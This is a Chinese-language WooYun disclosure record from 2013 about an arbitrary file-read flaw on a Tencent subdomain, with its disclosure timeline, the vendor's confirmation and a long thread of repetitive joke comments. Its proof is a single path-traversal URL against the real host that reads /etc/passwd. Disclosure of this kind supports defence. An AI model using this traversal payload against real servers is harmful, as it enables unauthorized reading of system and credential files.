当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039461

漏洞标题:腾讯某子站任意文件读取漏洞

相关厂商:腾讯

漏洞作者: 梦半醒

提交时间:2013-10-12 08:09

修复时间:2013-11-26 08:09

公开时间:2013-11-26 08:09

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-12: 细节已通知厂商并且等待厂商处理中
2013-10-12: 厂商已经确认,细节仅向厂商公开
2013-10-22: 细节向核心白帽子及相关领域专家公开
2013-11-01: 细节向普通白帽子公开
2013-11-11: 细节向实习白帽子公开
2013-11-26: 细节向公众公开

简要描述:

可以查看腾讯服务器的任意文件包括etc/passwd在内哦!

详细说明:

可以查看腾讯服务器的任意文件包括etc/passwd在内哦!

漏洞证明:

QQ截图20131012075805.png


http://mma.qq.com//newqun3/....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd

修复方案:

你们懂得,希望腾讯公司在建立新站时也不要忽视网络安全。。。。

版权声明:转载请注明来源 梦半醒@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-10-12 12:44

厂商回复:

感谢反馈,问题已确认,目前正在修复中。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-10-12 09:28 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    我擦

  2. 2013-10-12 09:31 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    我擦擦

  3. 2013-10-12 09:45 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    我擦擦擦

  4. 2013-10-12 09:48 | 冰比冰水冰 ( 路人 | Rank:8 漏洞数:3 | 风吹裤裆蛋蛋凉)

    我擦擦擦擦

  5. 2013-10-12 09:51 | 请好心人解放我的左手 ( 路人 | Rank:12 漏洞数:2 | 昨天,有一个女孩拒绝了我的爱意,第二天早...)

    我擦擦擦擦擦

  6. 2013-10-12 09:57 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    我擦擦擦擦擦擦

  7. 2013-10-12 10:04 | eval ( 普通白帽子 | Rank:131 漏洞数:23 | 专注小厂商五十年。)

    我擦擦擦擦擦擦擦

  8. 2013-10-12 10:45 | secer ( 路人 | Rank:5 漏洞数:2 | 来乌云学习学习)

    我擦擦擦擦擦擦擦擦

  9. 2013-10-12 11:04 | 大仙 ( 路人 | Rank:5 漏洞数:1 )

    我擦擦擦擦擦擦擦擦擦

  10. 2013-10-12 12:42 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    我擦擦擦擦擦擦擦擦擦擦

  11. 2013-10-12 12:54 | 啦绯哥 ( 普通白帽子 | Rank:107 漏洞数:20 )

    我擦擦擦擦擦擦擦擦擦擦擦

  12. 2013-10-12 13:13 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    我擦擦擦擦擦擦擦擦擦擦擦擦

  13. 2013-10-12 13:55 | 方小顿 ( 路人 | 还没有发布任何漏洞 | xsser)

    我擦擦擦擦擦擦擦擦擦擦擦擦擦

  14. 2013-10-12 13:59 | choit ( 路人 | Rank:5 漏洞数:1 | 你懂的)

    我擦擦擦擦擦擦擦擦擦擦擦擦擦擦

  15. 2013-10-12 14:24 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    我擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦

  16. 2013-10-12 15:00 | 猥琐 ( 路人 | Rank:6 漏洞数:2 | 学习什么的最重要!)

    我擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦

  17. 2013-10-12 15:04 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    我擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦

  18. 2013-10-12 15:23 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    我擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦

  19. 2013-10-12 15:30 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    我擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦

  20. 2013-10-12 18:09 | SuperSyt ( 路人 | Rank:4 漏洞数:6 | 90后苦逼程序员)

    我擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦

  21. 2013-10-12 18:30 | 我是慢羊羊 ( 路人 | Rank:2 漏洞数:1 | 嗯哼。。啦啦啦啦啦)

    我擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦

  22. 2013-10-12 18:36 | 我是慢羊羊 ( 路人 | Rank:2 漏洞数:1 | 嗯哼。。啦啦啦啦啦)

    @SuperSyt 你多数了 。。。两

  23. 2013-10-12 18:37 | 我是慢羊羊 ( 路人 | Rank:2 漏洞数:1 | 嗯哼。。啦啦啦啦啦)

    @围剿 你也多数了。。。我队形都排乱了

  24. 2013-10-12 18:50 | 梦半醒 ( 路人 | Rank:15 漏洞数:2 | Computer is all my life.)

    0.0

  25. 2013-11-01 13:11 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    我擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦

  26. 2013-11-12 11:21 | Cacker ( 路人 | Rank:4 漏洞数:6 | 小菜鸟。大神见笑了。)

    我擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦

  27. 2013-11-26 08:49 | etcat ( 普通白帽子 | Rank:149 漏洞数:22 | 0101010101001010101010101010100101010101...)

    我擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦

  28. 2013-11-26 09:15 | Mr.醉心 ( 路人 | Rank:2 漏洞数:2 | 爱生活,爱音乐,爱美女,更爱波多野结衣)

    我擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦

  29. 2013-12-12 10:44 | Desktd ( 实习白帽子 | Rank:72 漏洞数:11 | 背上行囊,就是过客;放下包袱,就找到了故乡.)

    我擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦擦